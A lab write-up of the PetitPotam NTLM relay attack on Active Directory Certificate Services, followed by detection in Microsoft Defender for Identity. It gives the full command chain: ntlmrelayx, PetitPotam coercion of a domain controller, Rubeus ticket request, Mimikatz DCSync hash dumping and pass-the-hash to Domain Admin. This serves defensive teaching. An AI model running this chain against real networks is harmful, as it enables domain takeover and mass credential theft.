PetitPotam…from attack to detection via Microsoft Defender for Identity (MDI)

5 min readAug 10, 2021

PetitPotam is a NTLM relay attack on Active Directory Certificate Services (AD CS) HTTP Endpoints. If the following AD CA services are installed the Active Directory is vulnerable to the attack.

See KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS) for more information how to mitigate.

The attack

My lab setup for the attack is shown below.

The Domain Controllers have the latest Microsoft 365 Defender for Identity (MDI) sensors installed.

PSPKIAudit

Verify vulnerable certificates templates via PSPKIAudit on the Windows 10 machine (I added Everyone with Full Control on the Computer template certificate).

Import-Module .\PSPKIAudit.psm1
Invoke-PKIAudit -CAComputerName WSRV2016-DC01.s3cur1ty.local

PetitPotam

PetitPotam is a PoC (Proof of Concept) tool which exploits the MS-EFSRPC (Encrypting File System Remote) protocol to force a Windows hosts (WSRV2016-DC02; 192.168.178.11) to authenticate to another host (Kali linux; 192.168.178.49).

An attacker can target a Domain Controller (WSRV2016-DC02; 192.168.178.11) and relay DC NTLM credentials to the Active Directory Certificate Services (AD CA) Web enrollment pages to enroll a DC certificate.

NTLMRelayx

Start ntlmrelayx.py and wait for connection to the AD CS (WSRV2016-DC01;192.168.178.10) and a (computer) certificate is requested.

Keep in mind to add the pull request to use the extension --adcs to exploit the AD CS vulnerability (the ‘--adcs’ option not available in the latest version of Impacket).

python3 ntlmrelayx.py -t http://192.168.178.10/certsrv/certfnsh.asp -smb2support --adcs

after NtlmRelayx is started, run PetitPotam (from the example above) to the 2nd domain controller (WSRV2016-DC02 send machine credentials to Kali Linux).

python3 petitpotam.py 192.168.178.49 192.168.178.11

Authenticating to http://192.168.178.10 as S3CUR1TY/WSRV2016-DC02$ succeeded, a CSR is generated and a Base64 certificate is created of user S3CUR1TY/WSRV2016-DC02$.

We can see the issued Certificate in the Certification Authority application on the AD CA.

Rubeus

The Base64 certificate can be used to request a TGT (Ticket Granting Ticket) Kerberos ticket.

Rubeus.exe asktgt /user:WSRV2016-DC02$ /certificate:<base64-certificate> /ptt

Keep in mind to use the latest version of Rubeus for /certificate parameter support.

With klist we can see the cached Kerberos ticket(s) on the local machine with privileges for DCSync.

MimiKatz — DCSync

DCSync is a MimiKatz module to dump the password hashes of all users from the Domain Controller over the network without interactive logon.

lsadump::dcsync /domain:s3cur1ty.local /all /csv

The output is the NTLM hash of a Domain Admin (SID ends with 512) account (e.g. Administrator in our example).

MimiKatz — Pass the hash

PTH (Pass-the-hash) is a MimiKatz module to start a command prompt (or /run:powershell.exe will run PowerShell) in the context of the Administrator account with Domain Admin privileges.

Before PTH we don’t have access to the Domain Controller.

privilege::debug
sekurlsa::pth /user:Administrator /domain:s3cur1ty.local /ntlm:6cff5d10edb2c4…

The command prompt (cmd.exe) has Domain Admin privileges and we can access the Domain Controller.

And …GAME OVER :-)

Microsoft Defender for Identity

Microsoft Defender for Identity is the Microsoft tool to detect attacks and/or anomalies on the Active Directory like Golden Ticket (forged TGT) or Silver Ticket (forget TGS) attack for example.

Microsoft Defender for Identity version 2.158.14362 detects the PetitPotam attack on Active Directory Certificate Services. The alert is Suspicious network connection over Encrypting File System Remote Protocol

The DCSync attack is also detected by Microsoft Defender for Identity.

Microsoft 365 Defender

Microsoft 365 Defender is the XDR (eXtended Detection and Respond) tool to detect correlated alerts into a single Incident for ease of investigation and (automatic) remediation (AIR).

Microsoft 365 Defender provides a protection layer (IPC, MDI, MDE, MDO & MCAS) over all assets of the Modern Workplace (Identity, Devices, Apps & Data).

Defense in-depth or zero trust is the most practical approach against new (0-day) attacks, even if some detections capabilities are not yet implemented.